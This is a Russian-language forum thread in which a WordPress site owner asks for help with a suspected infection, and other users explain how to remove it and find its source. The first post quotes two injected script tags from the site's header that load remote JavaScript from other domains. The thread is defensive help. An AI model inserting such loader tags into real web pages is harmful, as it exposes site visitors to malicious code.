Помогите определить наличие вируса на сайте

<script type="text/javascript" src="http://psy-ufa.ru/wp-includes/images/wlw/1/404.php"></script><script type="text/javascript" src="http://master-style.ru/js/tiny_mce/plugins/emotions/img/1/404.php"></script></head>
что за строчка?

По смыслу - заглушки, по расположению - хрень полная))

Автор, вырежи из header.php указанную выше строку от птички и до птички - и сохрани. Если опять появится - это жопа...

И хостинг смени... Украинский флажок настораживает - там практически нет нормальных хостеров. У немцев надежные и копеечные виртуальные хостинги есть.

Спасибо, помогло, был там такой код. А что если появится снова?* Откуда оно вообще берется?

Обычно такое берется из:
Вирусной инъекции - взлома админки и вписания кода в хедер;
Корень сайта - если хостер подлюка, или если по ftp был несанкционированный доступ к файлам.
Хостер если такое делает - наращивает ТИЦ по заказу, путем паразитирования на сайтах своих клиентов. Если у твоего хостера есть услуга "Нарастим ТИЦ!", то стоит призадуматься...

Откуда берется:
1. Левая сборка Вп
2. Использование левых шаблонов. Проверь или в исходнике был этот код, скачай все файлы с хостинга и Нотепадом++ в поиске файлов прогони по "psy-ufa" и т.д
3. Использование непроверенных плагинов или скачивание их с непонятных ресурсов
4. Проблемный провайдер (или сам ставит...что маловероятно при нулевых пузомерках, или уязвимый, неправильные доступы к файлам и т.д.)
5. Брут ФТП\админки. Нужны плагины по защите подбора и т.д.
В любом случае посмотри исходный шаблон, смени пароли на все что можно.

Обычно такие ссылки в шаблоне ныкают, скачайте все файлы сайты на локальный компьютер, запустите Notepad++ Там сделайте поиск по фойлам в скачанной папке. Ищите ссылку либо "base64"

Ох и орфография получилась

Да, там шаблоны то левые, но я их чистил, при установке шаблона стандартного такая ерунда через пару дней появлялась.

Возьми старую копию сайта и новую - проверь на изменения в коде этим Araxis Merge

хостинг смени